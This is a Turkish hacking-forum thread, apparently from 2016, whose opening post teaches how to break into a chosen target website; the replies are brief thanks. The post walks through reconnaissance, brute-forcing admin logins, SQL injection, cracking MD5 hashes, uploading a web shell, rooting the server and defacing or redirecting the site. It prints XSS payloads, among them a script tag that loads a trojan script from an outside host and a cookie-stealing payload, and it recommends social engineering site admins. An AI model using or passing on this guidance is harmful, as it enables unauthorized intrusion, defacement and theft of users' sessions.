Konuyu Oyla:
  • Derecelendirme: 3.71/5 - 7 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Hedef Site Hack
#1
Selamunaleyküm Arkadaşlar Bu Yazımda Sizlere Hedef Site Hack Hakkında Bilgi Vericem Öncelikle Programla Hack Olmaz Demeyin onuda yardımcı elaman olarak kullanıyoruz Programla Şöyle Olur Anlatayım Program Hep Yardımcı Elamandır...

Kısa Bir Sekılde Anlatacagım sizlere önce Hedef site http://www.siteadı.com hedef site bu öncelikle ne yapmamız gerekli onu anlatacagım

Oncelikle Hedef Sitenizi Tanımamız Gerekiyor...
Sitemiz Hangi Dilde Yazılmış?

Php,html,asp
http://www.siteadı.com/index.asp yazdık acılmadı
http://www.siteadı.com/index.html yazdık acılmadı
http://www.siteadı.com/index.php Yazdık acıldı site dili php oldugunu ögrendık şimdide Özel Bir Scripti Var Mı yokmu ona bakacagız
vbulletin,mybb,smf,wordpresss,joomla
Yada Öteki Piyasada Bulunan Scriptlerden Birinemi Ait?
Kişisel ve Firmasal Scriptler veya Diğer Scriptlermi diye bakacagız.
kısa bir yol daha war

http://www.siteadı.com/robots.txt yazdın genelde hazır sistem oldugunda admin girişini veriyor admin giriş bilgisinde ögrenebilirsiniz.

Eğer Scriptini Bulduysanız Simdi O Scriptte Daha Önceden Bulunmuş Açık Var Mı Ona Bakalım Bunu Öğenmek İçin Su Sitelerde Script Adını Aratacagız....

-- exploit-db.com
-- 1337day.com (Yeni Milw0rm)

En Popüler ve İlgi Gören Exploit Siteleri Buralardır...Bunlann Dışında Başka Sitelerde De Aratabilirsiniz
Burdan Güncel bir acık vermedı ozaman kendımız manuel arıyacagız...
Arayacağımız Muhtemel Açıklar ;

Cpnel Brute
Wordpres Brute
joomla brute
XSS Bugs
Sql Bugs
XSRF-CSRF Bugs
Rfi Bugs
Lfi Bugs
Upload Bugs
Html Injection Bugs vs güncel bildigim acıkları denıyoruz

site üzerinde odamı olmadı programlarla acık taratıyoruz acık arama programları ile bir acık acık yok ise site ozaman ne yapacagız serverdeki diger sitelerde acık arıyacagız nasılmı sitelerine hedef site veriyoruz http://www.siteadı.com veriyoruz onlar cekıyor sıtelerı..

http://urltara.com/
http://www.yougetsignal.com/

sitelerde taratıp serverdki siteleri tek tek denıyoruz bildigimiz Muhtemel Açıklar yöntemleri denıyoruz oda olamdı programla acık arıyoruz bir acık bulduk aradıgımız yöntemlerde verdi sql acıgı verdi md5 'e ulaşdık hemen kırmayı denıyoruz yapacagız googlede bir cok md5 cracker kırma onlıe siteler var ve bir cok perl pyhton dlinde kodlanmıs scpritler var orda kırabilirmisiniz ewet kırdık md5 panele daldık şimdi ne yapacagız..
Panele Daldıktan Sonraki Yapılacaklar Neler ? Napıcaz ?


- Shell Upload Ediyoruz
shell yerse serverde bypas , config , forbin , root oluyoruz hedef siteye ulaşmak için ewet bypas vb gibi olamdı root oluyoruz gereklı kernel sürümünü bulup rootladık hedef siteye ulaşdık shellden sql baglanıp admın girişlerini degiştik ve hedef siteyi hackledık varsayalım shell yemıyor...









Shell yukleme Olmuyor Mu ?
- Hacklediğimiz Bir Siteye Yönlendirerek İndeximizi Açıyoruz Ama Nasıl ? Aşağıdaki
Kodu Ana Sayfadaki Bir Dökümana Ekleyerek..

Alıntı:<meta http-equiv='refresh" content="5;URL=http://www.yonleneceksite.com'>
2 Sayısı Kaç Saniyede Sitemizin Açılacağını Ayarlar.[/color]

sql arama yöntemleri..
burdan ögrenmek istiyenler sql
sql Açıklarını Tarayalım
Sql Bug Olması İçin Öncefikle Sitede id Değerlerinin Bulunması Gerek.
Su Şekilde Yani ;

PHP Kod:
.php?id=
.
asp?id=
.
aspx?id
Bunlar Gibi ID Değerleri Varsa Sitemizde Muhtemel Sql Açığı BuIunabílir...Açık Olup Olmadığını Anlamak için ID Değerinin Sonuna 'a (tırnak işareti) Kuyup ErıIserlıyoruz...Eğer Site Hata veriyorsa Muhtemel acık Vardır...
Bu Takdirde Siteye Manuel Yada Programlarla Sql Injection Yapabilirsiniz...
Bazen Error Vermeyebilir,Yada Verir De Siz Göremezsiniz...Bu Sefer Eğer Sql Olduğurıa İnaniyorsaniz
Blind Sql Injection Deneyebilirsiniz.Yada acık arma programına veya sql acık arama programına Atabílirsiniz acık bulmaya calısırız..


Sonra Xss Açıklarını Tarıyalım
Gene ID Değeri Yada Arama Sayfası Lazım Bize...
Buralara Javascript Kodlarını Direkt Olarak Girerek Yahut Enoode Edip Girerek Error Verdirebiliyorsak
Anlayın Ki Açık Vardır...

- O Güzel Javasaipt Kodumuz Bu ;
Kod:
<script>alert('archavin')</script>
Nasıl yedireceğimize gelince:
ID Değerlerinin Sonuna Ekleyip Enterlıyabiliriz Yada Search.php?q= Böyle Bir Değerin Sonuna Ekleyerek
Enterlıyabiliriz...
Bunu Char vb Algoritrııalarla Şifreleyerek De Girebifiriz...Bu Şekilde Filtrelerneyi De Aşmış Oluruz...

- Yani Bu Şekilde ;
Kod:
<script>alert('string.fromcharcode(66, 111, 122, 107, 117, 114, 116, 57, 55)')</script>
- Eğer Site Bize Javascript Uyarısı Veriyoısa Açık Var Demektir -Bu Şekilde Servera Zararlı Kod Bile
Yedirebíliriz...

Kod:
<script scr=http://cyberizm.org/trojen.js></script>
- Bu Şekilde De Yazılıma Ait Çerez Bilgisi ni Kutucuğa Yansıtabiliriz...
Kod:
<script>alert(document.cookie);</script>
Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kirnlîk doğrulamayı sağlayan
zayıf bileşenleridir. Saãdıgan eğer sayfayı ziyaret eden kullanıcılann Çerez bilgisini okuyup kaydedebilirse
kendi bilgileri İle yerlerini değişlirerek kurbanın yetkilerine Ulaşabilir.Çerez Bilgisi Çalma Konusu
Sitemizde Mevcuttur.


Sosyal Mühendislik (SM) Yöntemi İle Hack

Eğer Zekanızı Kullanırsanız Emin Olun Bu Yöntemle Hackleyemeyeceğiniz Site Yoktur.
Güvenlik Zincirinin En Zayıf Halkası İnsandır.Bir Zincirin Halkalarından Birinin Kopması, Zincirin
Parçalanmasına Yeter. Bunu Dünyanın En İyi Sosyal Mühendislikci Hackerı Söylemiştir Benimde Foveri Sözümdür

Admini Deneyerek Yada Kandırarak Yapılan Yöntemdir.


archavin anlatımıyla alıntı degildir.
Beğenenler: Blanka , MultiFlex , OrJiNaL , teo , r00tturk
#2
ellerne sağlk
Beğenenler:
#3
saolasın
Beğenenler:
#4
tesekkurler abi exciting
Beğenenler:
#5
Eline Sağlık Abi
Beğenenler:
#6
Teşekkürler. Tamda böyle bi konu arıyodum
Beğenenler:
#7
Eline Sağlık
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  1 Adet İsrail Sql Acıklı Site// J3adJ3oy 2 24 8 saat önce
Son Yorum: J3adJ3oy
  Yeni Kolay Site Hack :) ByMuh4mm3d 207 5,534 8 saat önce
Son Yorum: anubis
  Tv site dorkları Mrxxx 1 25 07-12-2016, Saat: 17:32
Son Yorum: the_zizil
  PHP ile IP Adresini Dosya yada Site Üzerinden Loglatmak KingSkrupellos 11 119 07-12-2016, Saat: 09:43
Son Yorum: the_zizil
  Manuel site sql bulma Stallk3r 5 904 06-12-2016, Saat: 20:43
Son Yorum: J3adJ3oy
Anahtar Kelimeler

Hedef Site Hack indir, Hedef Site Hack Videosu, Hedef Site Hack Online izle, Hedef Site Hack Bedava indir, Hedef Site Hack Yükle, Hedef Site Hack Hakkında, Hedef Site Hack Nedir, Hedef Site Hack Free indir, Hedef Site Hack Oyunu, Hedef Site Hack Download


1 Ziyaretçi